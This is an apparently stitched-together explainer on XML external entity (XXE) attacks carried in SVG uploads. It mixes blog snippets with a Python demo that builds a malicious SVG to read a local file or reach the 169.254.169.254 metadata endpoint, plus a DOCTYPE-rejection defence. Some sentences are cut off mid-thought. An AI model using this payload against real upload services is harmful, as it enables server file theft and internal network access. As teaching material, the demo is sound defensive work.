SVG XXE. XXE can also be found in XML-based file formats such as SVG files, including during server-side SVG image conversion (for example, when an uploaded SVG is parsed and rendered to a raster thumbnail).
XXE attack types:
Exploiting XXE to retrieve files: an external entity is defined containing the contents of a file, and that content is returned in the application's response.
Exploiting XXE to perform SSRF attacks: an external entity is defined based on a URL to a back-end system, so the server makes the request on the attacker's behalf.
Exploiting blind XXE to exfiltrate data out-of-band: where sensitive data ...

In this example we will take a look at how we can leak data from a file using an SVG.
One such format is the Scalable Vector Graphics (SVG) image format: an SVG is an XML document, so any DOCTYPE and entity declarations it carries are handled by whatever XML parser the server uses to process the upload.
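The following is an added example, not code from the original page or from any of the write-ups it quotes. It builds the kind of SVG an attacker would upload as a "profile picture" and parses it with Python's standard-library SAX parser, standing in for a server-side image pipeline that extracts <text> content. The parser choice (xml.sax), the temporary secret file, the sample secret value, and the internal metadata URL are all assumptions made for the demonstration; the RecordingResolver replaces the network so the SSRF attempt is visible without a socket.

```python
"""Added example: SVG as an XXE carrier, parsed with Python's stdlib SAX parser.

Assumptions (not from the page): the image pipeline reads <text> content from
an uploaded SVG with xml.sax; the secret file, its contents and the internal
URL below are constructed for this demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource


def build_xxe_svg(system_id: str) -> bytes:
    """Attacker-controlled 'profile picture': a valid SVG whose internal DTD
    declares an external general entity and references it inside <text>.
    system_id may be a local path (file disclosure) or a URL (SSRF)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE svg [\n"
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="40">\n'
        '  <text x="0" y="20">&xxe;</text>\n'
        "</svg>\n"
    ).encode("utf-8")


class TextCollector(ContentHandler):
    """Collects character data, as a renderer that draws <text> would."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks).strip()


class RecordingResolver(EntityResolver):
    """Stand-in for the network: records each system ID the parser asks for
    and hands back an empty entity, so the SSRF attempt is observable offline."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = InputSource(systemId)
        src.setByteStream(io.BytesIO(b""))
        return src


def render_svg_text(svg_bytes, resolve_external_entities, resolver=None):
    """Parse an SVG and return its text content.

    resolve_external_entities=True is the vulnerable configuration: xml.sax's
    default EntityResolver then opens whatever local path or URL the SYSTEM
    identifier names. False (the default since Python 3.7.1) leaves the
    entity reference empty."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg_bytes))
    return handler.text()


def reject_dtd(svg_bytes):
    """Upload-handler hardening: refuse any SVG carrying a DOCTYPE or entity
    declaration before it reaches a parser. This also rejects the harmless
    DTD reference some drawing tools emit, a deliberate trade-off."""
    if b"<!DOCTYPE" in svg_bytes or b"<!ENTITY" in svg_bytes:
        raise ValueError("SVG with DTD/entity declarations rejected")
    return svg_bytes


def demo_file_read():
    """File disclosure: the secret's contents come back as <text> content."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        with open(secret, "w") as f:
            f.write("db_password=hunter2")  # constructed sample secret
        svg = build_xxe_svg(secret)
        leaked = render_svg_text(svg, resolve_external_entities=True)
        safe = render_svg_text(svg, resolve_external_entities=False)
        return leaked, safe


def demo_ssrf():
    """SSRF: the parser tries to fetch the back-end URL named in the entity."""
    resolver = RecordingResolver()
    # Hypothetical internal endpoint; no request is actually sent.
    svg = build_xxe_svg("http://169.254.169.254/latest/meta-data/")
    render_svg_text(svg, resolve_external_entities=True, resolver=resolver)
    return resolver.requested


if __name__ == "__main__":
    print(demo_file_read())
    print(demo_ssrf())
```

The same SVG drives both outcomes; only the SYSTEM identifier changes. Disabling external general entities stops the expansion, but the DOCTYPE pre-check is the cheaper control for an upload endpoint, since it rejects the payload before any parser sees it.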
I found this vulnerability in the profile picture upload as well as in the CV upload functionality of an application.

XXE in SVG Parsing (10 Apr 22). Hello everyone, in this blog I will describe how I was able to find an XXE that leads to SSRF via a file upload.

XXE in a rapid web application development framework allows reading arbitrary files.